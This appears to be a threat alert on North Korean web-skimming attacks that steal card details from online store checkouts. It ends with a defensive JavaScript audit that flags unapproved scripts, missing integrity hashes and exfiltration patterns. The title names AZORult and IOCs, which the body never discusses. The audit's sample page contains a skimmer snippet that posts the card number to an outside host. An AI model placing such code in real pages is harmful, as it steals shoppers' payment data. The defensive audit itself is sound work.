Rewterz Threat Alert – Latest AZORult Malware – IOC’s
July 6, 2020

Severity
High
Analysis Summary
Infamous North Korean hackers have set their sights on online stores after hacking banks and cryptocurrency exchanges, orchestrating ATM cash-outs, and deploying ransomware. The state-sponsored hacking crews are breaking into online stores to insert malicious code that steals buyers’ payment card details as they visit the checkout page and fill in payment forms. According to an extensive report published by SanSec, the attacks have been observed since May 2019.
These types of attacks are known as “web skimming,” “e-skimming,” or “Magecart attacks,” the last name taken from the first group that used these tactics.
The goal of these attacks is for hackers to gain access to a web store’s backend server, associated resources, or third-party widgets, from where they can install and run malicious code on the store’s frontend. The code loads only on the checkout page and silently logs payment card details as they are entered into checkout forms. This data is then exfiltrated to a remote server, from where the hackers collect it and sell it on underground cybercrime markets.
Pyongyang has been linked to cyber heist activity for a long time: its crews have targeted banks all over the globe and have been involved in ATM heists and ATM cash-outs in different regions, so it is no longer surprising that they have turned their eyes to online stores for financial gain after the US government recently imposed further sanctions. These attacks have historically gravitated towards any type of cybercrime that can generate a profit for the Pyongyang regime.
Impact
- Gain access
- Financial loss
- Exposure of sensitive information
Remediation
Keep websites patched against exploitable vulnerabilities.
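The Analysis Summary above describes skimmer code that is injected into a store’s frontend, loads only on the checkout page, reads card fields and sends them to a remote server. As an added example (not code from the Rewterz alert or from SanSec), the script below shows the defender-side check a store operator can run against the HTML served on the checkout page: it inventories every `<script>` element, flags external script hosts that are not on an allowlist, flags external scripts that lack Subresource Integrity, flags inline scripts that combine a network-send primitive with payment-field names, and builds the `script-src` Content-Security-Policy directive that enforces the same allowlist in the browser. The store origin, the allowed hosts and the sample HTML are all constructed for the example; the `integrity` value is a placeholder, not a real hash.

```javascript
// Added example, not from the Rewterz alert: audit the <script> tags on a checkout
// page against an allowlist and derive a matching CSP script-src directive.
// PAGE_ORIGIN, ALLOWED_SCRIPT_HOSTS and SAMPLE_CHECKOUT_HTML are constructed values.

const PAGE_ORIGIN = "https://shop.example";                                    // assumed store origin
const ALLOWED_SCRIPT_HOSTS = ["cdn.shop.example", "static.payments.example"];   // assumed allowlist

// Constructed checkout page. The last <script> mimics the behaviour described in the
// alert (reads the card field, sends it off-site) so the inline heuristic has a hit.
// The integrity attribute holds a placeholder, not a real SRI hash.
const SAMPLE_CHECKOUT_HTML = `<html><head>
<script src="https://cdn.shop.example/js/checkout.js" integrity="sha384-PLACEHOLDERHASH" crossorigin="anonymous"></script>
<script src="https://static.payments.example/sdk.js"></script>
<script src="https://analytics-cdn.example.net/track.js"></script>
<script>
  document.getElementById("card-number").addEventListener("change", function (e) {
    fetch("https://collect.example.net/c", { method: "POST", body: e.target.value });
  });
</script>
</head><body><form id="checkout"><input id="card-number"></form></body></html>`;

// Pull every <script> element out of the HTML with its src, integrity and inline body.
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i) || [])[1] || null;
    const integrity = (attrs.match(/\bintegrity\s*=\s*["']([^"']+)["']/i) || [])[1] || null;
    scripts.push({ src, integrity, body: m[2].trim() });
  }
  return scripts;
}

// Heuristics for inline scripts: something that can send data off the page, combined
// with a reference to a payment field. Either alone is normal; together they deserve review.
const SEND_PRIMITIVES = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|new\s+Image\b/;
const PAYMENT_FIELDS = /card|cvv|cvc|expir/i;

// Audit one page. Returns a list of findings, each { kind, detail }.
function auditCheckoutScripts(html, allowedHosts = ALLOWED_SCRIPT_HOSTS, origin = PAGE_ORIGIN) {
  const findings = [];
  const selfHost = new URL(origin).host;
  for (const s of extractScripts(html)) {
    if (s.src) {
      const host = new URL(s.src, origin).host;   // a relative src resolves to the store itself
      if (host !== selfHost && !allowedHosts.includes(host)) {
        findings.push({ kind: "unexpected-host", detail: s.src });
      }
      if (host !== selfHost && !s.integrity) {
        findings.push({ kind: "missing-sri", detail: s.src });
      }
    } else if (SEND_PRIMITIVES.test(s.body) && PAYMENT_FIELDS.test(s.body)) {
      findings.push({ kind: "inline-exfil-pattern", detail: s.body.slice(0, 60) });
    }
  }
  return findings;
}

// Build the script-src directive that enforces the same allowlist in the browser.
// No 'unsafe-inline' and no wildcard, so inline and off-list scripts are refused at load time.
function buildScriptSrcCsp(allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  return "script-src 'self' " + allowedHosts.map((h) => "https://" + h).join(" ") + ";";
}

for (const f of auditCheckoutScripts(SAMPLE_CHECKOUT_HTML)) {
  console.log(f.kind, f.detail);
}
console.log(buildScriptSrcCsp());
```

On the constructed page the audit reports `missing-sri` for the payments SDK, `unexpected-host` and `missing-sri` for the analytics script, and `inline-exfil-pattern` for the inline block, while a page that loads only same-origin scripts produces no findings. Run against a copy of the real checkout HTML on a schedule, a diff of these findings over time is a cheap way to notice a newly injected script; the CSP directive is the enforcing counterpart, and it only works as a mitigation if the allowlist is kept as short as the store can tolerate.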